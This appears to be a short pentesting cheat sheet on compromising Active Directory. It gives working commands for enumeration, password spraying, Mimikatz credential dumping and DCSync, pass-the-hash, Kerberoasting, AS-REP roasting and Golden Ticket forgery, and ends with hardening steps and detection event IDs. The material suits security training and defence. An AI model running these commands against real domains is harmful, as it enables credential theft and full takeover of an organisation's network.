Key Takeaways
- Active Directory is the identity backbone of 95%+ enterprises
- Kerberos attacks bypass password authentication entirely
- BloodHound reveals attack paths humans can't find manually
- Domain Admin compromise means total organizational compromise
Contents
1. Understanding Active Directory
Active Directory (AD) is Microsoft's directory service used by 95%+ of Fortune 500 companies for centralized identity management. Compromising Domain Admin means complete control over every user, computer, and file in the organization.
Core Components
- Domain Controller (DC): Server running AD DS, authenticates users
- Domain: Administrative boundary for objects
- Forest: Collection of domains with trust relationships
- Kerberos: Primary authentication protocol (tickets)
- NTLM: Legacy authentication (hash-based)
- LDAP: Protocol for directory queries (port 389/636)
2. AD Enumeration
# PowerShell enumeration
Get-ADDomain
Get-ADUser -Filter * -Properties *
Get-ADGroup -Filter * | Select Name
Get-ADGroupMember "Domain Admins"
Get-ADComputer -Filter *
# Net commands
net user /domain
net group "Domain Admins" /domain
# BloodHound collection
.\SharpHound.exe -c All
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod AllBloodHound Queries
Shortest Paths to Domain Admins • Kerberoastable Accounts • Users with DCSync Rights • Computers where Domain Users are Local Admin
3. Credential-Based Attacks
Password Spraying
crackmapexec smb dc.domain.local -u users.txt -p 'Summer2024!'
kerbrute passwordspray -d domain.local users.txt 'Password123'NTLM Hash Extraction (Mimikatz)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::dcsync /user:AdministratorPass-the-Hash
# Use NTLM hash without cracking
psexec.py -hashes :NTLM_HASH [email protected]
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH4. Kerberos Attacks
Kerberoasting
Request service tickets for SPNs and crack offline - no special privileges needed!
Rubeus.exe kerberoast /outfile:hashes.txt
GetUserSPNs.py domain/user:pass -request -outputfile hashes.txt
hashcat -m 13100 hashes.txt rockyou.txtGolden Ticket
Forge TGT with krbtgt hash - complete domain persistence for 10 years!
mimikatz # lsadump::dcsync /user:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /pttAS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
hashcat -m 18200 asrep.txt rockyou.txt5. Persistence Techniques
- DCSync: Replicate credentials from DC (lsadump::dcsync)
- Skeleton Key: Inject master password into LSASS
- AdminSDHolder: Persistent ACL on privileged groups
- Golden Ticket: Valid until krbtgt reset twice
6. Defense & Hardening
Critical Hardening Steps
- Tiered Admin Model: DA only on Tier 0 systems
- Reset krbtgt twice yearly (minimum)
- Protected Users Group for sensitive accounts
- LAPS for local admin passwords
- Credential Guard on all systems
- Disable LLMNR/NBT-NS to prevent relay
- gMSA for service accounts
- < 5 Domain Admins recommended
7. Detection & Monitoring
| Event ID | Attack Indicator |
|---|---|
| 4768 | TGT requested (Golden ticket) |
| 4769 | TGS requested (Kerberoasting) |
| 4771 | Pre-auth failed (AS-REP roast) |
| 4625 | Failed logon (Password spray) |
| 4662 | AD operation (DCSync) |
| 4776 | NTLM auth (Pass-the-Hash) |
8. Essential Tools
Offensive: Mimikatz, BloodHound, Rubeus, Impacket, CrackMapExec, PowerView
Defensive: PingCastle, Purple Knight, Defender for Identity
FAQ
How fast can AD be compromised?
Average time to DA in pentests: 48-72 hours. Many environments fall within hours due to misconfigurations.
What's the first check in an AD assessment?
Run BloodHound for attack paths + PingCastle for security scoring. Look for Kerberoastable accounts and paths to DA.